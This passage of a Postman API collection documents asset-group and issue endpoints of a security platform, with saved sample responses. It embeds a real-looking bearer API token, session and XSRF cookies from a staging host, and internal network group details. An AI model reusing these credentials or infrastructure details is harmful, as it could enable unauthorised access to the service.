and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0693ehg2v2fk91xdotfhbh6ejm9930.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"75198258-b821-42f9-8c76-fdb4cdcad252","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"deleted\":2,\"deleted_ids\":[\"5d0a332fc569d5025016ec59\",\"5d0a11cac569d5025016ec4e\"],\"not_deleted\":0}"},{"id":"4624566c-35fd-40eb-bd8b-a92042096f9c","name":"Malformed Request Body","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Content","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": \"5d0a0e59c569d5025016ec41\"\n}"},"url":"https://homolog.gat.digital/api/v1/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Wed, 19 Jun 2019 13:34:31 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0x57llh0lrhrf103niu92cuo1p9979.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01nnhstt6st2en1hb0ol10xwgwm9982.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=319c7bad-4250-443a-ad44-9079eaab40db;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01nnhstt6st2en1hb0ol10xwgwm9982.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"319c7bad-4250-443a-ad44-9079eaab40db","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"ea7f342d-01b4-4c69-8cfc-a9b3d47d75c4"}],"id":"49b34b22-c976-4146-9598-83d2c7c4ab72","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"25fa4a91-9ee7-4a1a-bfd8-01c4237bd10c"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"3597c490-7cbf-43f8-a46d-b7304ac1dec6"}}],"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","description":""},{"name":"Grupos de Ativos","item":[{"name":"Assets Groups","id":"d5d3eb86-c0a7-4b38-922f-f896b7ca2243","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/assets-groups?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Asset Groups on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Asset Groups on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","assets-groups"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"71508ea4-bce6-46ee-aa21-7371aedc4f7d","name":"Get the first 30 Assets Groups","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://subdomain.gat.digital/api/v1/assets-groups?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets-groups"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:14:31 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01uifi67b2jco31dvizhi5qxodp10069.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0svolnvz0q91opu8s6w405ec010071.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=eefb62ee-906f-4092-8bcf-332f8e50aef1;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0svolnvz0q91opu8s6w405ec010071.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"eefb62ee-906f-4092-8bcf-332f8e50aef1","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"assets_group_id\": \"5be9d3cbe12f5edae4cf6331\",\n            \"assets_group_name\": \"EXP-10.41.22\"\n        },\n        {\n            \"assets_group_id\": \"5be9d3b1e12f5edae4cf6330\",\n            \"assets_group_name\": \"EXP-10.41.21\"\n        },\n        {\n            \"asset\": [\n                \"5abbd513e12f5e05704bf911\",\n                \"5abbd513e12f5e05704bf943\",\n                \"5abbd513e12f5e05704bf8f5\",\n                \"5abbd513e12f5e05704bf8de\",\n                \"5abbd513e12f5e05704bf972\",\n                \"5abbd513e12f5e05704bf918\",\n                \"5abbd513e12f5e05704bf95a\",\n                \"5abbd513e12f5e05704bf8f8\",\n                \"5abbd513e12f5e05704bf954\"\n            ],\n            \"assets_group_id\": \"5ad7a11ae12f5e056e3297c5\",\n            \"assets_group_name\": \"EXP-10.102-W2K3R2\",\n            \"assets_group_description\": \"<p>Servidores da rede interna com sistema operacional Windows Server 2003 R2.</p>\"\n        },\n        {\n            \"asset\": [\n                \"5abbd513e12f5e05704bf8d5\",\n                \"5abbd513e12f5e05704bf8d6\",\n                \"5abbd513e12f5e05704bf8d7\",\n                \"5abbd513e12f5e05704bf8d8\",\n                \"5abbd513e12f5e05704bf8d9\",\n                \"5abbd513e12f5e05704bf8da\",\n                \"5abbd513e12f5e05704bf8db\",\n                \"5abbd513e12f5e05704bf8dc\",\n                \"5abbd513e12f5e05704bf8dd\",\n                \"5abbd513e12f5e05704bf8df\",\n                \"5abbd513e12f5e05704bf8e0\",\n                \"5abbd513e12f5e05704bf8e1\",\n                \"5abbd513e12f5e05704bf8e2\",\n                \"5abbd513e12f5e05704bf8e3\",\n                \"5abbd513e12f5e05704bf8e4\",\n                \"5abbd513e12f5e05704bf8e5\",\n                \"5abbd513e12f5e05704bf8e6\",\n                \"5abbd513e12f5e05704bf8e7\",\n                \"5abbd513e12f5e05704bf8e8\",\n                \"5abbd513e12f5e05704bf8e9\",\n                \"5abbd513e12f5e05704bf8ea\",\n                \"5abbd513e12f5e05704bf8eb\",\n                \"5abbd513e12f5e05704bf8ec\",\n                \"5abbd513e12f5e05704bf8ed\",\n                \"5abbd513e12f5e05704bf8ee\",\n                \"5abbd513e12f5e05704bf8ef\",\n                \"5abbd513e12f5e05704bf8f0\",\n                \"5abbd513e12f5e05704bf8f1\",\n                \"5abbd513e12f5e05704bf8f2\",\n                \"5abbd513e12f5e05704bf8f3\",\n                \"5abbd513e12f5e05704bf8f4\",\n                \"5abbd513e12f5e05704bf8f5\",\n                \"5abbd513e12f5e05704bf8f6\",\n                \"5abbd513e12f5e05704bf8f7\",\n                \"5abbd513e12f5e05704bf8f8\",\n                \"5abbd513e12f5e05704bf8f9\",\n                \"5abbd513e12f5e05704bf8fa\",\n                \"5abbd513e12f5e05704bf8fb\",\n                \"5abbd513e12f5e05704bf8fc\",\n                \"5abbd513e12f5e05704bf8fd\",\n                \"5abbd513e12f5e05704bf8fe\",\n                \"5abbd513e12f5e05704bf8ff\",\n                \"5ac65ccae12f5e056e3297bd\",\n                \"5abbd513e12f5e05704bf900\",\n                \"5abbd513e12f5e05704bf901\",\n                \"5abbd513e12f5e05704bf902\",\n                \"5abbd513e12f5e05704bf903\",\n                \"5abbd513e12f5e05704bf904\",\n                \"5abbd513e12f5e05704bf905\",\n                \"5abbd513e12f5e05704bf906\",\n                \"5abbd513e12f5e05704bf907\",\n                \"5abbd513e12f5e05704bf908\",\n                \"5abbd513e12f5e05704bf909\",\n                \"5abbd513e12f5e05704bf90a\",\n                \"5abbd513e12f5e05704bf90b\",\n                \"5abbd513e12f5e05704bf90c\",\n                \"5abbd513e12f5e05704bf90d\",\n                \"5abbd513e12f5e05704bf90e\",\n                \"5abbd513e12f5e05704bf90f\",\n                \"5abbd513e12f5e05704bf910\",\n                \"5abbd513e12f5e05704bf911\",\n                \"5abbd513e12f5e05704bf912\",\n                \"5abbd513e12f5e05704bf913\",\n                \"5abbd513e12f5e05704bf914\",\n                \"5abbd513e12f5e05704bf915\",\n                \"5abbd513e12f5e05704bf916\",\n                \"5abbd513e12f5e05704bf917\",\n                \"5abbd513e12f5e05704bf918\",\n                \"5abbd513e12f5e05704bf919\",\n                \"5abbd513e12f5e05704bf91a\",\n                \"5abbd513e12f5e05704bf91b\",\n                \"5abbd513e12f5e05704bf91c\",\n                \"5abbd513e12f5e05704bf91d\",\n                \"5abbd513e12f5e05704bf91e\",\n                \"5abbd513e12f5e05704bf91f\",\n                \"5abbd513e12f5e05704bf920\",\n                \"5abbd513e12f5e05704bf921\",\n                \"5abbd513e12f5e05704bf922\",\n                \"5abbd513e12f5e05704bf923\",\n                \"5abbd513e12f5e05704bf924\",\n                \"5abbd513e12f5e05704bf925\",\n                \"5abbd513e12f5e05704bf926\",\n                \"5abbd513e12f5e05704bf927\",\n                \"5abbd513e12f5e05704bf928\",\n                \"5abbd513e12f5e05704bf929\",\n                \"5abbd513e12f5e05704bf92a\",\n                \"5abbd513e12f5e05704bf92b\",\n                \"5abbd513e12f5e05704bf92c\",\n                \"5abbd513e12f5e05704bf92d\",\n                \"5abbd513e12f5e05704bf92e\",\n                \"5abbd513e12f5e05704bf92f\",\n                \"5abbd513e12f5e05704bf930\",\n                \"5abbd513e12f5e05704bf931\",\n                \"5abbd513e12f5e05704bf932\",\n                \"5abbd513e12f5e05704bf933\",\n                \"5abbd513e12f5e05704bf934\",\n                \"5abbd513e12f5e05704bf935\",\n                \"5abbd513e12f5e05704bf936\",\n                \"5abbd513e12f5e05704bf937\",\n                \"5abbd513e12f5e05704bf938\",\n                \"5abbd513e12f5e05704bf939\",\n                \"5abbd513e12f5e05704bf93a\",\n                \"5abbd513e12f5e05704bf93b\",\n                \"5abbd513e12f5e05704bf93c\",\n                \"5abbd513e12f5e05704bf93d\",\n                \"5abbd513e12f5e05704bf93e\",\n                \"5abbd513e12f5e05704bf93f\",\n                \"5abbd513e12f5e05704bf940\",\n                \"5abbd513e12f5e05704bf941\",\n                \"5abbd513e12f5e05704bf942\",\n                \"5abbd513e12f5e05704bf943\",\n                \"5abbd513e12f5e05704bf944\",\n                \"5abbd513e12f5e05704bf945\",\n                \"5abbd513e12f5e05704bf946\",\n                \"5abbd513e12f5e05704bf947\",\n                \"5abbd513e12f5e05704bf948\",\n                \"5abbd513e12f5e05704bf949\",\n                \"5abbd513e12f5e05704bf94a\",\n                \"5abbd513e12f5e05704bf94b\",\n                \"5abbd513e12f5e05704bf94c\",\n                \"5abbd513e12f5e05704bf94d\",\n                \"5abbd513e12f5e05704bf94e\",\n                \"5abbd513e12f5e05704bf94f\",\n                \"5abbd513e12f5e05704bf950\",\n                \"5abbd513e12f5e05704bf951\",\n                \"5abbd513e12f5e05704bf952\",\n                \"5abbd513e12f5e05704bf953\",\n                \"5abbd513e12f5e05704bf954\",\n                \"5abbd513e12f5e05704bf955\",\n                \"5abbd513e12f5e05704bf956\",\n                \"5abbd513e12f5e05704bf957\",\n                \"5abbd513e12f5e05704bf958\",\n                \"5abbd513e12f5e05704bf959\",\n                \"5abbd513e12f5e05704bf95a\",\n                \"5abbd513e12f5e05704bf95b\",\n                \"5abbd513e12f5e05704bf95c\",\n                \"5abbd513e12f5e05704bf95d\",\n                \"5abbd513e12f5e05704bf95e\",\n                \"5abbd513e12f5e05704bf95f\",\n                \"5abbd513e12f5e05704bf960\",\n                \"5abbd513e12f5e05704bf961\",\n                \"5abbd513e12f5e05704bf962\",\n                \"5abbd513e12f5e05704bf963\",\n                \"5abbd513e12f5e05704bf964\",\n                \"5abbd513e12f5e05704bf965\",\n                \"5abbd513e12f5e05704bf966\",\n                \"5abbd513e12f5e05704bf967\",\n                \"5abbd513e12f5e05704bf968\",\n                \"5abbd513e12f5e05704bf969\",\n                \"5abbd513e12f5e05704bf96a\",\n                \"5abbd513e12f5e05704bf96b\",\n                \"5abbd513e12f5e05704bf96c\",\n                \"5abbd513e12f5e05704bf96d\",\n                \"5abbd513e12f5e05704bf96e\",\n                \"5abbd513e12f5e05704bf96f\",\n                \"5abbd513e12f5e05704bf970\",\n                \"5abbd513e12f5e05704bf971\",\n                \"5abbd513e12f5e05704bf972\",\n                \"5abbd513e12f5e05704bf973\",\n                \"5abbd513e12f5e05704bf974\",\n                \"5abbd513e12f5e05704bf975\",\n                \"5abbd513e12f5e05704bf976\",\n                \"5abbd513e12f5e05704bf977\",\n                \"5abbd513e12f5e05704bf978\",\n                \"5abbd513e12f5e05704bf979\",\n                \"5abbd513e12f5e05704bf97a\"\n            ],\n            \"assets_group_id\": \"5ac4dbafe12f5e056e329792\",\n            \"assets_group_name\": \"EXP-10.102\",\n            \"assets_group_description\": \"<p>REDE DE SERVIDORES 10.102.1</p>\"\n        },\n        {\n            \"asset\": [\n                \"5ab9178ee12f5e05704b903c\",\n                \"5ab9178ee12f5e05704b903e\",\n                \"5ab9178ee12f5e05704b903f\",\n                \"5ab9178ee12f5e05704b9040\",\n                \"5ab9178ee12f5e05704b9041\",\n                \"5ab9178ee12f5e05704b9042\",\n                \"5ab9178ee12f5e05704b9043\",\n                \"5ab9178ee12f5e05704b9044\",\n                \"5ab9178ee12f5e05704b9045\",\n                \"5ab9178ee12f5e05704b9046\",\n                \"5ab9178ee12f5e05704b9047\",\n                \"5ab9178ee12f5e05704b9048\",\n                \"5ab9178ee12f5e05704b9049\",\n                \"5ab9178ee12f5e05704b904a\",\n                \"5ab9178ee12f5e05704b904b\",\n                \"5ab9178ee12f5e05704b904c\",\n                \"5ab9178ee12f5e05704b904d\",\n                \"5ab9178ee12f5e05704b904e\",\n                \"5ab9178ee12f5e05704b904f\",\n                \"5ab9178ee12f5e05704b9050\",\n                \"5ab9178ee12f5e05704b9051\",\n                \"5ab9178ee12f5e05704b9052\",\n                \"5ab9178ee12f5e05704b9053\",\n                \"5ab9178ee12f5e05704b9054\",\n                \"5ab9178ee12f5e05704b9055\",\n                \"5ab9178ee12f5e05704b9056\",\n                \"5ab9178ee12f5e05704b9057\",\n                \"5ab9178ee12f5e05704b9058\",\n                \"5ab9178ee12f5e05704b9059\",\n                \"5ab9178ee12f5e05704b905a\",\n                \"5ab9178ee12f5e05704b905b\",\n                \"5ab9178ee12f5e05704b905c\",\n                \"5ab9178ee12f5e05704b905d\",\n                \"5ab9178ee12f5e05704b905e\",\n                \"5ab9178ee12f5e05704b905f\",\n                \"5ab9178ee12f5e05704b9060\",\n                \"5ab9178ee12f5e05704b9061\",\n                \"5ab9178ee12f5e05704b9062\",\n                \"5ab9178ee12f5e05704b9064\",\n                \"5ab9178ee12f5e05704b9065\",\n                \"5ab9178ee12f5e05704b9066\",\n                \"5ab9178ee12f5e05704b9067\",\n                \"5ab9178ee12f5e05704b9068\",\n                \"5ab9178ee12f5e05704b9069\",\n                \"5ab9178ee12f5e05704b906a\",\n                \"5ab9178ee12f5e05704b906b\",\n                \"5ab9178ee12f5e05704b906c\"\n            ],\n            \"assets_group_id\": \"5ab91862e12f5e056e329781\",\n            \"assets_group_name\": \"EXP-DMZ\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 1,\n    \"totalElements\": 5,\n    \"last\": true,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 5,\n    \"size\": 30,\n    \"number\": 0\n}"}],"_postman_id":"d5d3eb86-c0a7-4b38-922f-f896b7ca2243"},{"name":"Assets Group by ID","id":"254a1633-8d9f-465c-af53-5fce5f1cc7ff","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/assets-groups/<assets-group_id>","description":"<p>This endpoint allows you to retrieve a single Assets Group, specifying its ID. If there is no active Assets Group with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","assets-groups","<assets-group_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"33c244f6-dee6-45a5-a057-6d46316c79c2","name":"Try to get a wrong Assets Group","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/assets-groups/5ad7a11ae12f5e0000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:22:43 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0w2d978fjmtsz1ryhiyjr94xit10077.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node010bvi8x2pjknu8gv9az6q7f1f10078.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=89758abe-d51a-42a6-80da-815935e383be;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node010bvi8x2pjknu8gv9az6q7f1f10078.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"89758abe-d51a-42a6-80da-815935e383be","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"0d7a1d63-dc58-44c2-99b2-233b1d95fbbd","name":"Get an Assets Group","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/assets-groups/5ad7a11ae12f5e056e3297c5"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:21:56 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ced7p1wr5c0r1sdkedl5stefl10076.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0w2d978fjmtsz1ryhiyjr94xit10077.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=767133b6-d97d-401e-a16f-e80a576025c4;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0w2d978fjmtsz1ryhiyjr94xit10077.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"767133b6-d97d-401e-a16f-e80a576025c4","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"asset\": [\n        \"5abbd513e12f5e05704bf911\",\n        \"5abbd513e12f5e05704bf943\",\n        \"5abbd513e12f5e05704bf8f5\",\n        \"5abbd513e12f5e05704bf8de\",\n        \"5abbd513e12f5e05704bf972\",\n        \"5abbd513e12f5e05704bf918\",\n        \"5abbd513e12f5e05704bf95a\",\n        \"5abbd513e12f5e05704bf8f8\",\n        \"5abbd513e12f5e05704bf954\"\n    ],\n    \"assets_group_id\": \"5ad7a11ae12f5e056e3297c5\",\n    \"assets_group_name\": \"EXP-10.102-W2K3R2\",\n    \"assets_group_description\": \"<p>Servidores da rede interna com sistema operacional Windows Server 2003 R2.</p>\"\n}"}],"_postman_id":"254a1633-8d9f-465c-af53-5fce5f1cc7ff"}],"id":"ef396dcb-5f1b-48cc-a518-3bdd3ef9ed79","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"919a3a1e-1f08-40ae-aa5e-d22f98e6c386"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"d7d7a9a1-f323-4a34-9427-7e8ed248fb73"}}],"_postman_id":"ef396dcb-5f1b-48cc-a518-3bdd3ef9ed79","description":""},{"name":"Perfis","item":[{"name":"Profiles","id":"297860fe-eeaf-405b-8f67-e813f071e66a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/profiles?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Profiles on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is 